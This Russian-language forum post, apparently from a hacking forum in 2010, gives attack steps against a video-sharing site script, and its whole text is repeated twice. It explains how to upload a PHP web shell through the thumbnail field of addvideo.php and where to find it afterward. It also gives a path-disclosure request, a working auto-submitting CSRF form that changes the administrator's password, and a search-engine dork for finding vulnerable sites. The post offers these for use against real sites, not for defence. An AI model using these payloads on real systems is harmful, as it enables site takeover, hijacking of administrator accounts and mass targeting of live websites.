seofilms
29.04.2010, 20:49
Заливка шелла без прав админа :
Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
После заливки он находится здесь : cайт/thumbs/имявашегошелла.php
http://images.kidal.org/images/shell.jpg
Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w
Раскрытие путей :
сайт/search.php?search[]=way&searchsubmit=
csrf уязвимость
<form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf">
<input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">
</form>
<script>
document.csrf.submit();
</script>
Поисковой запрос
inurl:search.php?order=views
(C)forum.kidal.org (http://forum.kidal.org/showthread.php?t=152)
Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
После заливки он находится здесь : cайт/thumbs/имявашегошелла.php
http://images.kidal.org/images/shell.jpg
Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w
Раскрытие путей :
сайт/search.php?search[]=way&searchsubmit=
csrf уязвимость
<form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf">
<input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">
</form>
<script>
document.csrf.submit();
</script>
Поисковой запрос
inurl:search.php?order=views
(C)forum.kidal.org (http://forum.kidal.org/showthread.php?t=152)